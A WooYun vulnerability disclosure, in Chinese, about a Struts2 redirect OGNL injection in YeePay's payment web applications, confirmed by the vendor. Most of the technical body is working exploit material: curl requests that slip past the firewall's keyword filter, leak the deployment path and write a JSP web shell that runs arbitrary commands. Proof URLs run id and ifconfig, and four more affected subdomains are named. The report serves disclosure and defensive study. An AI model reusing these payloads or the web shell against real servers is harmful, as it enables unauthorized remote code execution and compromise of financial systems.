当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-088006

漏洞标题:易宝支付某漏洞修复不当可致GETSHELL

相关厂商:易宝支付

漏洞作者: loopx9

提交时间:2014-12-21 10:17

修复时间:2015-02-04 10:18

公开时间:2015-02-04 10:18

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-21: 细节已通知厂商并且等待厂商处理中
2014-12-24: 厂商已经确认,细节仅向厂商公开
2015-01-03: 细节向核心白帽子及相关领域专家公开
2015-01-13: 细节向普通白帽子公开
2015-01-23: 细节向实习白帽子公开
2015-02-04: 细节向公众公开

简要描述:

影响www域下应用。

详细说明:

http://www.yeepay.com/individualservice/Login.action
看到action习惯性测试struts漏洞,http://www.yeepay.com/individualservice/Login.action?redirect:/xxoo

HTTP/1.1 302 Moved Temporarily
Server: Tengine/2.0.3
Date: Sat, 20 Dec 2014 08:34:12 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.yeepay.com/individualservice/xxoo
Content-Language: zh-CN
Set-Cookie: BIGipServerpool_css=2736695488.36895.0000; expires=Sat, 20-Dec-2014 8:49:12 GMT; path=/

咦,跳转了,有戏,果断上命令exp。最后却发现被waf拦截了。

403.png


不死心继续。。。测试发现waf过滤了allowStaticMethodAccess、processBuilder,命令执行无望,尝试能不能写shell。
http://www.yeepay.com/individualservice/Login.action?java.io.File ---> is OK
http://www.yeepay.com/individualservice/Login.action?java.io.PrintWriter --->is OK
可以File操作,看来只针对命令执行的exp提取关键字添加规则进行过滤,对File操作是放行的。下面就开始写shell了。
0x1 找web目录
org.apache.catalina.jsp_classpath里面包含得有项目部署路径,可以从中找出来。由于yeepay web容器为jboss,对url长度好像有限制,所以需要截取(自己本地Tomcat测试则没有)。检索individualservice位置:

http://www.yeepay.com/individualservice/Login.action?redirect:${%23application.get(%27org.apache.catalina.jsp_classpath%27).indexOf(%22individualservice%22)}
HTTP/1.1 302 Moved Temporarily
Server: Tengine/2.0.3
Date: Sat, 20 Dec 2014 08:55:06 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.yeepay.com/individualservice/8232
Content-Language: zh-CN

位置为8232,substring调整长度:

curl -i http://www.yeepay.com/individualservice/Login.action -d 'redirect:${%23application.get(%27org.apache.catalina.jsp_classpath%27).substring(8100,8400)}'
HTTP/1.1 302 Moved Temporarily
Server: Tengine/2.0.3
Date: Sat, 20 Dec 2014 10:01:42 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.yeepay.com/individualservice/efault/tmp/deploy/tmp4813126319445231330servlets-default.jar:/export/home/jboss-4.0.3SP1/server/default/deploy/jbossweb-tomcat55.sar/:/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war/:/export/home/jboss-4.0.3SP1/lib/gnu-regexp.jar:/export/home/jboss-4.0.3SP1/server/default/lib
Content-Language: zh-CN
Set-Cookie: BIGipServerpool_css=186558656.36895.0000; expires=Sat, 20-Dec-2014 10:16:42 GMT; path=/

找到web目录: /export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war
0x2 写shell

curl  -i 'http://www.yeepay.com/individualservice/Login.action'  -d 'redirect:${(%23a%3d(new%20java.io.PrintWriter(%22/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war/lala.jsp%22)),%23a.write(%27%3C%25%40%20page%20import%3D%22java.io.*%22%20%25%3E%20%3C%25%20String%20cmd%20%3D%20request.getParameter(%22cmd%22)%3B%20String%20output%20%3D%20%22%22%3B%20if(cmd%20!%3D%20null)%20%7B%20String%20s%20%3D%20null%3B%20try%20%7B%20Process%20p%20%3D%20Runtime.getRuntime().exec(cmd)%3B%20BufferedReader%20sI%20%3D%20new%20BufferedReader(new%20InputStreamReader(p.getInputStream()))%3B%20while((s%20%3D%20sI.readLine())%20!%3D%20null)%20%7B%20output%20%2B%3D%20s%20%2B%22%5C%5Cr%5C%5Cn%22%3B%20%7D%20%7D%20catch(IOException%20e)%20%7B%20e.printStackTrace()%3B%20%7D%20%7D%20%25%3E%20%3Cpre%3E%20%3C%25%3Doutput%20%25%3E%20%3C%2Fpre%3E%27),%23a.close())%2b%23a}'
HTTP/1.1 302 Moved Temporarily
Server: Tengine/2.0.3
Date: Sat, 20 Dec 2014 10:04:00 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.yeepay.com/individualservice/nulljava.io.PrintWriter@1517394
Content-Language: zh-CN
Set-Cookie: BIGipServerpool_css=2736695488.36895.0000; expires=Sat, 20-Dec-2014 10:19:00 GMT; path=/


shell地址: http://www.yeepay.com/individualservice/lala.jsp

id.png


存在同一问题其他站点应用:

http://www.yeepay.com/selfservice/requestRegister.action
http://m.yeepay.com/donategroup/PrintDonateCert.action
http://gongyi.yeepay.com/mlove/showMediaInfo.action
http://zht.yeepay.com/zhtservice/login.action

漏洞证明:

http://www.yeepay.com/individualservice/lala.jsp?cmd=id

id.png


http://zht.yeepay.com/zhtservice/lala.jsp?cmd=/sbin/ifconfig

zht.png


http://m.yeepay.com/boss_donategroup/test.txt
http://m.yeepay.com/donategroup/test.txt

test.png

修复方案:

赶紧修复吧。测试过程只写一个lala.jsp,未删。没有动数据。

版权声明:转载请注明来源 loopx9@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-12-24 14:41

厂商回复:

代码历经多年,风风雨雨,修修补补,难免侧漏时候。感谢白帽子的提交,为我们推进安全整改提供强劲动力。

最新状态:

暂无